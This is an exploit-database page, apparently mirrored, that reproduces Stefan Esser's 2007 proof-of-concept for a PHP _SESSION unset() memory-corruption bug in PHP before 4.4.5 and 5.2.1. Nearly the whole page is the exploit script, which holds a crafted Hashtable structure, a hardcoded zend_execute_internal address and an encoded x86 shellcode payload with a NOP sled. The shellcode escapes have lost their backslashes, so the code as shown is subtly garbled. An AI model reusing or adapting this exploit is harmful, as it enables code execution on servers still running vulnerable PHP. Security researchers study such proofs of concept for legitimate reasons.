[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PHP < 4.4.5 / 5.2.1 _SESSION unset() Local Exploit
# Published : 2007-03-25
# Author : Stefan Esser
# Previous Title : PHP < 4.4.5 / 5.2.1 _SESSION Deserialization Overwrite Exploit
# Next Title : CrystalPlayer 1.98 Playlist Crafted mls File Local Buffer Overflow Exploit
<?php
////////////////////////////////////////////////////////////////////////
// _ _ _ _ ___ _ _ ___ //
// | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ | || || _ //
// | __ |/ _` || '_|/ _` |/ -_)| ' / -_)/ _` ||___|| _/| __ || _/ //
// |_||_|__,_||_| __,_|___||_||_|___|__,_| |_| |_||_||_| //
// //
// Proof of concept code from the Hardened-PHP Project //
// (C) Copyright 2007 Stefan Esser //
// //
////////////////////////////////////////////////////////////////////////
// PHP _SESSION unset() Vulnerability //
////////////////////////////////////////////////////////////////////////
// This is meant as a protection against remote file inclusion.
die("REMOVE THIS LINE");
$PHP_MAJOR_VERSION = PHP_VERSION;
$PHP_MAJOR_VERSION = $PHP_MAJOR_VERSION[0];
$shellcode = str_repeat("x90", 256).
"x29xc9x83xe9xebxd9xeexd9x74x24xf4x5bx81x73x13x46".
"x32x3cxe5x83xebxfcxe2xf4x77xe9x6fxa6x15x58x3ex8f".
"x20x6axa5x6cxa7xffxbcx73x05x60x5ax8dx57x6ex5axb6".
"xcfxd3x56x83x1ex62x6dxb3xcfxd3xf1x65xf6x54xedx06".
"x8bxb2x6exb7x10x71xb5x04xf6x54xf1x65xd5x58x3exbc".
"xf6x0dxf1x65x0fx4bxc5x55x4dx60x54xcax69x41x54x8d".
"x69x50x55x8bxcfxd1x6exb6xcfxd3xf1x65".
($PHP_MAJOR_VERSION==4?"x18xb0x53":"x18xb0x83");
$zend_execute_internal = 0x08345b08;
$Hashtable = pack("LLLLLLLLLCCC", 2, 1, 0, 0, 0, $zend_execute_internal, 0, $zend_execute_internal, 0x66666666, 0, 0, 0);
eval('
session_start();
unset($HTTP_SESSION_VARS);
unset($_SESSION);
$x = "'.$Hashtable.'";
session_register($shellcode);');
?>
# www.Syue.com [2007-03-25]